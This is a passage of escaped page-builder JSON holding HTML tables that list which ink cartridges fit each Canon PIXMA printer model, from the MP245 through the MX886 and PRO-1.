width=\\\"170\\\"><p>PIXMA MP245<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP258<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP276<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2be4aef\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d0f60c7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP287<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP460<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP476<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP486<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP496<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP497<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP500<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP520<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP530<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP568<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP600<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b289177\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b0d2e40\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP610<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP628<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP638<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP648<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP800R<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP810<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP830<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP970<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-8 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-8 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-5 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP988<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MP996<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d0130d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"fc01984\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6549880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ Bottle<\\/strong><\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX308<\\/p><\\/td><td width=\\\"208\\\"><p>CL-41 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-831 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-40\\/CL-41 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-830 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX328<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX338<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX347<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX366<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX426<\\/p><\\/td><td width=\\\"208\\\"><p>CL-811 (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CL-811XL (Colour)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810 Twin Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810\\/CL-811 Value Pack<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PG-810XL (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX876<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-821 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-821 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-820 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA MX886<\\/p><\\/td><td width=\\\"208\\\"><p>CLI-726 (Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>CLI-726 (Yellow)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-725 (Pigment Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\"><p>PIXMA PRO-1<\\/p><\\/td><td width=\\\"208\\\"><p>PGI-29 (Chroma Optimizer)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Dark Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Light Gray)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Matte Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Black)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Cyan)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Photo Magenta)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Red)<\\/p><\\/td><\\/tr><tr><td width=\\\"170\\\">\\u00a0<\\/td><td width=\\\"208\\\"><p>PGI-29 (Yellow)<\\/p><\\/td><\\/tr><\\/tbody><\\/table>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b7fc065\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"387b65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<table width=\\\"378\\\"><tbody><tr><td width=\\\"170\\\"><p><strong>Model<\\/strong><\\/p><\\/td><td width=\\\"208\\\"><p><strong>Cartridge \\/ 